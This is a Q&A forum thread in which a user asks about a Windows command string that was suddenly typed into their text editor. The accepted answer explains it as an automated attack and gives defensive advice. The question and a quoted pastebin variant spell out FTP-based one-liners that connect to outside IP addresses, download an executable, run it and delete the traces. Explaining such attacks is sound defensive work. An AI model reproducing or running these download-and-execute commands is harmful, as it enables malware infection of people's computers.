# I need help figuring out the meaning of a potential hijacking script

Tags: attacks

I am using Ubuntu 13.04. Something really strange happened. I was writing my homework for a Ruby course. I had Sublime Text 2 (a text editor like Notepad, Notepad++, Textmate etc.) opened and was working on some code. I was also surfing the web using latest version of Chrome. At some point I switched windows from Chrome to Sublime Text 2. I was about to write something, when suddenly the following script was "pasted" into my document:

```
eq&echo user 20858 17334 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq
```

It got pasted in several portions in very quick successions. It was as if someone had control over my computer and was pasting this. I am sure I didn't paste it myself (in case somebody thinks it somehow got copied to my clipboard to get pasted the next time I press Ctrl + V). So my question(s) - what does this script mean, what kind of attack was that and how do I protect myself from this in the future?

Answer (score 2, accepted):

Well, there seems to be a few similar snippets of code around the web. The most similar to yours was found on a Pastebin-type site that has since been removed (but the [Google Cache](http://webcache.googleusercontent.com/search?q=cache:JoIS4h5h7fkJ:www.pastebin.ca/2066609%20%22eq%20&csrss.exe%20&del%20eq%22&cd=3&hl=en&ct=clnk&gl=us) was still up):

> cmd /c echo open 201.120.57.137 21 >> ik &echo user oracle oracle >>
> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp
> -n -v -s:ik &del ik &update.exe &exit &echo open 95.125.139.200 11104 >> eq&echo user 1297 20204 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq

Although the code is somewhat different, there is [quite good analysis from veteran Ars Technica forum member Syonyk](http://arstechnica.com/civis/viewtopic.php?f=10&t=215528) here:

> tl;dr version: "Don't run VNC on a public IP with anything but a very,
> very strong password. Better yet, don't run it on a public port (bind
> it to localhost), and SSH/VPN in to access it."
>
> A friend of mine has a Mac, and her system has been a bit strange
> lately.
>
> Specifically, it's been acting suspiciously like it's been rooted -
> which, being a fellow Mac user, concerns me greatly. She's had random
> text show up in IM windows, but apparently was away from the computer
> and never investigated.
>
> Tonight, she had something show up in a terminal window while she was
> away, and IM'd it to me. I have remote (root) access to her system
> (she's aware of this and set up the account for me), and was bored, so
> I decided to investigate. ... My first thought was that this had to be
> an automated program. A human won't try to enter Win32 specific
> commands on a Mac. It appears that the program sent keycodes that were
> not translated properly to the Mac, which would be consistent with an
> automated program.

I would generally think that:

- This is an automated attack. csrss.exe is a Windows system
  executable, and someone specifically targeting your Linux system
  would not try to invoke it.
- This type of attack (passing a command sequence into the user
  clipboard in the hopes that it will be inadvertently executed in a
  command prompt) is not new - the Ars Technica post is from 2002, over
  a decade ago.

So I would suggest that your computer may not be compromised (contrary to the Ars Technica opinion above):

1. You sound like you would not have made the mistakes described. It may "just" be that a
   browser feature (or exploit) has allowed a malicious site to access
   your clipboard.
2. If indeed your computer has been compromised, the attacker would
   have no need to use this method - he would just interact with a
   shell remotely.

The solution for you would probably be watchful waiting - as in be alert for any further oddness, and if seen re-evaluate.

Or if some action were deemed prudent, probably the best would be the usual suspects - make sure your browser(s), browser plugins, and your OS are up to date with security patches.